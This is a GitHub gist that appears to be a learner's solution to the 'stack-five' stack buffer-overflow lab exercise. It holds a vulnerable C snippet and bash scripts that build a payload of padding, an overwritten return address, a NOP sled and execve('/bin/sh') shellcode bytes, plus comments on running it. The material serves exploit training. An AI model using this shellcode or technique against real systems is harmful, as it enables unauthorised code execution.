Last active
November 29, 2023 03:04
-
-
Save RealYukiSan/dfc8a004784896e7581ea0e89c3221e4 to your computer and use it in GitHub Desktop.
Iseng on t.me/c/1987506309/609/1516
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| int main(void) { | |
| char buf[10]; | |
| fread(buf, 1, 10, stdin); | |
| fwrite(buf, 1, 10, stdout); | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Specify the desired size in bytes and the string to repeat | |
| desired_size_bytes=128+8 # Ubah sesuai ukuran yang diinginkan | |
| str="y" # Ganti dengan string yang ingin diulangi | |
| # hex=$(printf '%s' "$str" | xxd -p -u) # if you need an output to be hex format, then uncomment this section | |
| output="" | |
| # Gunakan echo dan tr untuk mengulangi string hingga ukuran yang diinginkan | |
| for ((i = 0; i < $desired_size_bytes / ${#str}; i++)); do | |
| # output+=$(echo -n "\\x$hex") | |
| output+=$str | |
| done | |
| echo -n $output > pyld.bin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Specify the desired size in bytes and the string to repeat | |
| desired_size_bytes=128+8 # Ubah sesuai ukuran yang diinginkan | |
| str="y" # Ganti dengan string yang ingin diulangi | |
| # hex=$(printf '%s' "$str" | xxd -p -u) # if you need an output to be hex format, then uncomment this section | |
| output="" | |
| # Gunakan echo dan tr untuk mengulangi string hingga ukuran yang diinginkan | |
| for ((i = 0; i < $desired_size_bytes / ${#str}; i++)); do | |
| output+=$str | |
| done | |
| echo -n $output > pyld.bin | |
| echo -ne "\x40\xE6\xFF\xFF\xFF\x7F\x00\x00" >> pyld.bin | |
| output="" | |
| desired_size_bytes=8*6 | |
| str=$(echo -ne "\x90") | |
| for ((i = 0; i < $desired_size_bytes / ${#str}; i++)); do | |
| output+=$str | |
| done | |
| # output+=$(echo -ne "\xcc") | |
| # following this tutorial https://www.youtube.com/watch?v=HSlhY4Uy8SA&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=15 | |
| # https://shell-storm.org/shellcode/files/shellcode-806.html | |
| output+=$(echo -ne "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05") | |
| echo -n $output >> pyld.bin | |
| # total = 128+8 + 8 + 8*6 + 27 = 219 | |
| # padding + rip + nop sliding + shellcode | |
| # why we need to add nop sliding? |
also see this comment section
MAGIC
(cat ~/pyld.bin;cat) | ./stack-five
It's the same as cat | bash
whereas the user input (stdin) consumed by cat and then the output piped to bash instead of stdout
by default, running cat without any arguments will using stdin as file stream and print the content to stdout
MAGIC
(cat ~/pyld.bin;cat) | ./stack-five
but I wonder to see the whole process in GDB, but GDB not support piping output to stdin :(
I've tried this one, but it still didn't work
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
why the maximum size of stack is
2504? accessing beyond that, it will throw an error :(hexdump byte $rsp --size 2504I think the maximum size limit will depends on where is your current
%rsp